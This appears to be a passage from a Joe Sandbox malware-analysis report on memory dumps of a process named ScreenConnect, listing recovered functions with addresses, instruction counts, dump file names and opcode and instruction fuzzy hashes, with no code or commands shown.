Opcode Fuzzy Hash: 5c308ecb53b2550110bceae4f79f49cef5110838a70c6d097a4f2179e8b693fa
Instruction Fuzzy Hash: F1311070600B058FC730DF29D884656B7F2EF89325B548A1DD456DB7A0D730E945CB91

Function 00CA5649 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7289006842d184278ae81b4f15b6217a6c9806d65f36fa179581e0364016a166
Instruction ID: 94caa847ec3cbf924e44c8cb8e9d0d9a0c833d056cd2e1f98a709ff8a6c6f942
Opcode Fuzzy Hash: 7289006842d184278ae81b4f15b6217a6c9806d65f36fa179581e0364016a166
Instruction Fuzzy Hash: A021D671E01B06DFDB20CF65D8006AABBB6EF82324F44C56AE555CB2A0E7319E05CB91

Function 00CA3890 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 059b85aa34e05060717fc3ca81e4f389d563ef35db661712bd7dde41fa241077
Instruction ID: de2dbfd0523370f4d6cf48448b8e01d518f2be60642fca61b088efe549db59ff
Opcode Fuzzy Hash: 059b85aa34e05060717fc3ca81e4f389d563ef35db661712bd7dde41fa241077
Instruction Fuzzy Hash: C121D674F092858FCB06CB69C86456EFFB2EF86314B1540ABE8459B3A2DB349D05C7A1

Function 00CA5FB7 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e7314fcd6426f5032a437aa31a565af7d7d1e7d8b67bb678e43f7f19d1142e0
Instruction ID: 9d1effe89602a67edb0d246dfce5ed5be358c6b15b8c39c16cc46478a50e6e28
Opcode Fuzzy Hash: 9e7314fcd6426f5032a437aa31a565af7d7d1e7d8b67bb678e43f7f19d1142e0
Instruction Fuzzy Hash: 9111E631300B419FD72086AE8D41A56BBEADFD6759B28C576F529CB651EA30EC028790

Function 00CA50C1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16ce0d1721a17b6e13f7f9753d91da17191dd24611d747b28ae2489fdc3f79e7
Instruction ID: 156e82fd344abb9f39949a3ddae873c5b4987ea5219e5552ce663184bc0267d9
Opcode Fuzzy Hash: 16ce0d1721a17b6e13f7f9753d91da17191dd24611d747b28ae2489fdc3f79e7
Instruction Fuzzy Hash: FE11D5717002115BD700EB68E8407AEBBE2EFC5700F848966E509AB355DFB0BE05CBE1

Function 00CA4B70 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c6a4fa57c5dae492303a0385abac459e366a23d4bef1906ba0533012be1e4a4
Instruction ID: 573b73f8295569581682ab8fd7729acb6f58ab0fd75f4d993de3241147fc162a
Opcode Fuzzy Hash: 2c6a4fa57c5dae492303a0385abac459e366a23d4bef1906ba0533012be1e4a4
Instruction Fuzzy Hash: 0C213E302007059FC738DF26D85869AB7F1EF85325F108B2DD4A6976A1EB71E94ACF90

Function 00CA50D0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 877ea537b67839e295cb7fb00a0779692cef6e68f7dc1f10ff9bb966faa062f7
Instruction ID: 4083341ae16372f9383c980b66a4e6b002f76e13c27c983e152d5a4acbfd33f6
Opcode Fuzzy Hash: 877ea537b67839e295cb7fb00a0779692cef6e68f7dc1f10ff9bb966faa062f7
Instruction Fuzzy Hash: 3511E6717002105BD704EB68D841BAEB7E2EFC4700F94896AE519AB354DFB0BE0587D1

Function 00CA4F41 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98561aa189cd7fd67919e38ab1ebe7859fcbd2c4835b2b2193cd5e438132bed1
Instruction ID: 98c2c42fcea48253d8c8470c86f063487d56e7e6a093d1785d5abf2c865b1977
Opcode Fuzzy Hash: 98561aa189cd7fd67919e38ab1ebe7859fcbd2c4835b2b2193cd5e438132bed1
Instruction Fuzzy Hash: 8411427690020A9FDF00DFA8C8409DEBBF5EF49314F108565E605BB260D771BA06CBA0

Function 00CA5658 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a82382e110e777ee940d87940303d474c948233db097f42bbce05ac37e71c487
Instruction ID: 05b669b36b9b0bc4ac354dff507019c65f380f9e412cf8ca004a2d745e21f50e
Opcode Fuzzy Hash: a82382e110e777ee940d87940303d474c948233db097f42bbce05ac37e71c487
Instruction Fuzzy Hash: 41118B70F0060AAFDB14CA69C800AAFBBB6AFC5310F54C56AE614D7254EB719E01CB90

Function 00CA5035 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dea0861f9a738266709728d6ed96d019da5ad5df4044afc66006c34d2beb8437
Instruction ID: 9dcc4eb1e9003725b88518f421efe77a23b9e4f4ac8df764bd6b29fad4c26c09
Opcode Fuzzy Hash: dea0861f9a738266709728d6ed96d019da5ad5df4044afc66006c34d2beb8437
Instruction Fuzzy Hash: CB11587190011ADFCB01DFA8D4808DCBFB2FF86318B58C455E109AB125DB31AA46CBA1

Function 00CA4B61 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a46a17430aadf8c07c3bc5640a7a15263218e0430dfb36a091538c02ac0cf7f
Instruction ID: 0bc32bd4d02802b32806af4bb34e0453c526bf36a79c27db5853ec3df915e6d2
Opcode Fuzzy Hash: 9a46a17430aadf8c07c3bc5640a7a15263218e0430dfb36a091538c02ac0cf7f
Instruction Fuzzy Hash: D10122355002048FCB16CF64C849ACA7BF0EF8A328F0088A9D94697611C7B2E80ACF90

Function 00CA4F50 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd74ad70234dd8c0c2c5bbffe01bbf81cd0b4d1376e2bd797b6ef0e2c9e2fb52
Instruction ID: 22b9ea2702475e32d332b194d55305cafd878a47a37cc54b37fa5de49d65ff44
Opcode Fuzzy Hash: bd74ad70234dd8c0c2c5bbffe01bbf81cd0b4d1376e2bd797b6ef0e2c9e2fb52
Instruction Fuzzy Hash: B111167690020A9FCF00DFA8D9409DEBBF5FF49314B508555D609BB261D771BA05CB90

Function 00CA6E60 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f201f3d8cefd76ea8d13229004e64ca72f2014a437ef95e4d78713d0363b9ae6
Instruction ID: cbc0699815aa25f8fead172dcf2123dce961eadd01941920b79b3c4446fe1941
Opcode Fuzzy Hash: f201f3d8cefd76ea8d13229004e64ca72f2014a437ef95e4d78713d0363b9ae6
Instruction Fuzzy Hash: 90012B76B042219F8B048B59D8440ABBBE9EBC83153284D6BE415DB310DBB1ED028BD4

Function 00BBD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964300054.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_bbd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb300f0c1a4fbd894abe17354827921155614a0baf1b6df9587b1ad376d98cb2
Instruction ID: 68410a09c6144135d251b8c743f6918ce55af01944795cacd4067c81e4408220
Opcode Fuzzy Hash: fb300f0c1a4fbd894abe17354827921155614a0baf1b6df9587b1ad376d98cb2
Instruction Fuzzy Hash: 5801F7711043409BE7206A15CCC4BB6BFD8DF55325F18C599ED4D0B282D2BD9841C6B1

Function 00BBD006 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964300054.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_bbd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f665421597b6addc1c6c782e5e6f9dcfa694d832a9d9a6bec535d159830f84e2
Instruction ID: 070db5cc8bb34bca3ea0bafb282b56c91f6ad962454cfd4c891871183b53214d
Opcode Fuzzy Hash: f665421597b6addc1c6c782e5e6f9dcfa694d832a9d9a6bec535d159830f84e2
Instruction Fuzzy Hash: 6201526150D3C09FD7124B258C94B62BFB4DF53224F1981DBED888F1D3D2695844C772

Function 00CA4FDB Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fde64b6525ef5d766628eaa05c53b8c82f011b255fa7a431bc53fa4353b481b
Instruction ID: bab276c7984066c44e297ef74fced723f9a4a641f7e953906141a2c101a6f698
Opcode Fuzzy Hash: 1fde64b6525ef5d766628eaa05c53b8c82f011b255fa7a431bc53fa4353b481b
Instruction Fuzzy Hash: E2012832D0015A9BCB04DFA9E9048CDBFF2EF89314F45856AE90977260DB707916CBA0

Function 00CA8168 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e90e921a7704ece83e00c2c1fa25a5f8af980bdb2553da892af6be0afd190c99
Instruction ID: 3943d88bc3d5b255b0931d496689ac60d1ddfd2eb4edb7aa72807bf563075acd
Opcode Fuzzy Hash: e90e921a7704ece83e00c2c1fa25a5f8af980bdb2553da892af6be0afd190c99
Instruction Fuzzy Hash: 68F05836B082146BD728CABAA80069BBBDACBD4624B14807FE59DC3680E931A9018765

Function 00CA1414 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd1990764420992be8eac57cbaad59380da40699e1bcfce196bb45f8c872256f
Instruction ID: 471304c7e503d4fb0577be7678d709d747a9210fb4e18ac02951ceb59734dd11
Opcode Fuzzy Hash: cd1990764420992be8eac57cbaad59380da40699e1bcfce196bb45f8c872256f
Instruction Fuzzy Hash: C4F0467200C3908FD302877CE8212983FE1DE6330174809CBD046CB562D659A90AC721

Function 00CA5F68 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19b78d1714e592d41f91eb7b5a5849a79a283294ed2c9f39d3814005fc857986
Instruction ID: e1562100e9306231814463aedb9544d5ff972e48491221f31c318eeec956f8fb
Opcode Fuzzy Hash: 19b78d1714e592d41f91eb7b5a5849a79a283294ed2c9f39d3814005fc857986
Instruction Fuzzy Hash: 74F0ED32702E529F9B0146989C08051BBE98B6B329369C6A2F426CF252F630CC0287A1

Function 00CA12A0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0498c20dcd7b246609f484d93179562bbf8e9d4ed1678601f500aaea9b09e12d
Instruction ID: a521a48dce4bafe8e3ea1896128fa54c48977d621ff19a37e2ff63af8649604f
Opcode Fuzzy Hash: 0498c20dcd7b246609f484d93179562bbf8e9d4ed1678601f500aaea9b09e12d
Instruction Fuzzy Hash: 24F0E9352087505FC703972CA821A5F3BF5DFC671175844AFE865CB355DB309D058BA1

Function 00CA0880 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dafdf45c760ceeb5cdacbea73d5b805966cebeb912eee15f2e17b88fd70281f
Instruction ID: 936d86b0e66316cf2fd18e98d3f050712e457b06f775a4745ed52ef8c9b9a5e7
Opcode Fuzzy Hash: 2dafdf45c760ceeb5cdacbea73d5b805966cebeb912eee15f2e17b88fd70281f
Instruction Fuzzy Hash: E3F058B290E3949FD702DB789C115987FF0EA57301B5901DBD488DB297DA244A05E722

Function 00CA6EE8 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d90d0881a00183de89ec8a8ee945c9de8028d8bdd84632e7feb1393ed5b8f9a7
Instruction ID: 54d7b91e2947992b444e23f41d3426bb1b881a873ce1e362d684a21ff05967d9
Opcode Fuzzy Hash: d90d0881a00183de89ec8a8ee945c9de8028d8bdd84632e7feb1393ed5b8f9a7
Instruction Fuzzy Hash: 3CF027313043404FC7015BA5785C1697FE6EFCA7207C544BAE909C7351CE744C09C7A0

Function 00CA8160 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515224a4b0061eb22b78f48bf74ba95ad24fe42252fc7b9369abb2c2c9944cc7
Instruction ID: 58b71fb5827c3a596c9504bc1f682dda8b51944f86c8c37801c82a2384390b44
Opcode Fuzzy Hash: 515224a4b0061eb22b78f48bf74ba95ad24fe42252fc7b9369abb2c2c9944cc7
Instruction Fuzzy Hash: DBE09232A082106BD714DEBAA800A9B7BDECBC5224B00C47EA15DC3240ED30D505C7A5

Function 00CA12B0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 383b0126e54def12d5c5fffcc2d9e54983d0be6d7d8d9707bf3e8ffda4f65759
Instruction ID: 00945417985a63d76928478b417433025a644d84ea0052baf22dfd54dbb8fbcf
Opcode Fuzzy Hash: 383b0126e54def12d5c5fffcc2d9e54983d0be6d7d8d9707bf3e8ffda4f65759
Instruction Fuzzy Hash: 81F0E5363006115B8712A66DE810E5F37DADFC5B61714852DE915C7308DF70ED014BD0

Function 00CA35E0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118c33533e92cc60c8a6d867bceea160aa2a57b806f1deddf60bc961265aee37
Instruction ID: 54d84083078a68946052878de90af3aa3b08ece2f5dc0ea6bf2548d1e48305c8
Opcode Fuzzy Hash: 118c33533e92cc60c8a6d867bceea160aa2a57b806f1deddf60bc961265aee37
Instruction Fuzzy Hash: 37E0DFB6E082209FEB202BA974500EAB7E5DA8432431845ABE80AC3612E9659D0A47D1

Function 00CA1DA0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04bbf77a8287e9e3ace25a30f54b34fdcb910dba32ffe0ad05f02ad24de861ce
Instruction ID: ae6748ef55a5218e274042805c133d5e84ed49def5257cd0dc309a0a33e1bd5c
Opcode Fuzzy Hash: 04bbf77a8287e9e3ace25a30f54b34fdcb910dba32ffe0ad05f02ad24de861ce
Instruction Fuzzy Hash: 43F030313092945FC3066778A81885D3FA5DFEA22135540BBE50ACB2F3CF658C46C7A5

Function 00CA0838 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 026f158c861a0000ef09c5610452e38e1b987205bdfecbb3f5f2c4d317deedca
Instruction ID: 32772d5c4a37f18ebe88ff7b48a148b75e9237ff80c7915fdf3d82f525f399e3
Opcode Fuzzy Hash: 026f158c861a0000ef09c5610452e38e1b987205bdfecbb3f5f2c4d317deedca
Instruction Fuzzy Hash: 73F0207190A284AFC702CF789C51AAD7FF0DB4630171802EED408E72A3D9304E05A721

Function 00CA6EF8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c009591394f1e021b584b5bb1418aae8ba2a3a22e2c7633e51db92ebd9c729a7
Instruction ID: f5425d2d84483459b9644cb7a15384b9f88abb40b7a7561cc20ae646b6d3889e
Opcode Fuzzy Hash: c009591394f1e021b584b5bb1418aae8ba2a3a22e2c7633e51db92ebd9c729a7
Instruction Fuzzy Hash: 00E02632704310578B046AAA788C63EBADAEBCCB713D4403EF20EC3340CEB59C0643A4

Function 00CA1DF9 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24388692de5b1892cf9af928de247bb3af116dcd08328a775badd9aa7c41948e
Instruction ID: 2a24c73ad44ded907e0948f491283e5e69095fce71007bd98dccb83517f979b6
Opcode Fuzzy Hash: 24388692de5b1892cf9af928de247bb3af116dcd08328a775badd9aa7c41948e
Instruction Fuzzy Hash: 16E09230906308EFD701EBB4E91119D7BB4EB46204B5045D6E409DB212E6306E05CF91

Function 00CA5F78 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e47715f85c8293c3550e25371ed4b0100f1d80ddb1819f74e6a1e6f78eb90362
Instruction ID: a3c876709ceb885f3082aee000c6d3f7c7454303bff0c61548a5917e8c2939a2
Opcode Fuzzy Hash: e47715f85c8293c3550e25371ed4b0100f1d80ddb1819f74e6a1e6f78eb90362
Instruction Fuzzy Hash: C5E08C62B01C569F8B1091DD9D44555B7CA8B9A36CB3DC672F928CB380FA31DC024390

Function 00CA13D1 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae11ed683e376787975269fd88c691bf9f3fe19cc4bcbb21655f363583faee70
Instruction ID: cc70c68bf4b1ddd77d98557bdbd3de8ecdaf43c0f489d2410731502a8b49bfb9
Opcode Fuzzy Hash: ae11ed683e376787975269fd88c691bf9f3fe19cc4bcbb21655f363583faee70
Instruction Fuzzy Hash: 8CE0923110C7914FC312DB38E4112D87FE2AF92311B490AEAE445CB256DAA57D4D87A1

Function 00CA1819 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ebe1cfcf7ad927c2c40e98db5bcdac9308e8f6ba460110a1716a2eda2122e43
Instruction ID: 8a0574be6f44bebbd1ac78f90beb49992c4eebe5c021db6083aac5f3f3ccd8cb
Opcode Fuzzy Hash: 9ebe1cfcf7ad927c2c40e98db5bcdac9308e8f6ba460110a1716a2eda2122e43
Instruction Fuzzy Hash: EAF0393560A390CFC7165B74A86C85CBF72EF4A22631A409AD45A876A2CF3A9845CF12

Function 00CA1310 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e45c268997af49793a7a821cf716cf9486f84dfd82a4e0c0168cd9f7df4e2691
Instruction ID: f36ab424e4d0848c2a0485bad2e4ce0b112add9f4b7df6194f58e7e065fb8b23
Opcode Fuzzy Hash: e45c268997af49793a7a821cf716cf9486f84dfd82a4e0c0168cd9f7df4e2691
Instruction Fuzzy Hash: ACE01A70D06204DFCB40DF6884455EEBFF0EB1A210B1549AAD81AD7611E3324A0ACF91

Function 00CA1DB0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4823c72ada52fa268ceafcda7dfb127c36571238fbf843f5b3215dc32831f5da
Instruction ID: 960824aa9a2cc6aae4d7bebafa833a260166db465c9278e02a1a4db4cbb55a40
Opcode Fuzzy Hash: 4823c72ada52fa268ceafcda7dfb127c36571238fbf843f5b3215dc32831f5da
Instruction Fuzzy Hash: C7E0EC367001146B83047779E8188AE7EDADFED6623944137E51FD37A0CE719C4287E5

Function 00CA7FB7 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38bd4e220c12b8d557f4da96a01e2ae33b64d58077e63c072e3424875db5f76a
Instruction ID: 18f26e88d44e02e706865a18ce6a74862bfc89858fe9811d5baea556935a5f14
Opcode Fuzzy Hash: 38bd4e220c12b8d557f4da96a01e2ae33b64d58077e63c072e3424875db5f76a
Instruction Fuzzy Hash: 11E0DF6118C3C14FC3129768AD68289BFE09F87215F0848DFE5C68B183D169681BCBA3

Function 00CA8120 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2664b62a5420d9d126dd07d60cc579044a56f062b746ab9feca750b91d0ff9a8
Instruction ID: 028740328b5f639f908af02c9a9eb0435e8c2cee95cf2a0b9720db854f4b3453
Opcode Fuzzy Hash: 2664b62a5420d9d126dd07d60cc579044a56f062b746ab9feca750b91d0ff9a8
Instruction Fuzzy Hash: 60E04670419381CFD380EF78E908408BBE0BF49324F0588AED889CB251E630A946CF52

Function 00CA0848 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80308ad8a80e0c98e72ace0dbafc9913dcd891fcc200af40f738aaf779bda951
Instruction ID: aad27fa350a3fd29f0df3a6bc0733d010c2100877e7d7d8836960a026950b4e0
Opcode Fuzzy Hash: 80308ad8a80e0c98e72ace0dbafc9913dcd891fcc200af40f738aaf779bda951
Instruction Fuzzy Hash: CBD01770A01218FF8B00EFA8E901A9DBBF9EB48211B5045ADA408E3204EE716F019B90

Function 00CA1E08 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da48c7eabb3875501697df9f8ba298aff4629f38b2bb69998d22956e31e9809f
Instruction ID: 712cba3c52f302c9de8e677b121ea4df2f5c14017a54a2cd7e8a9b28387e2e9d
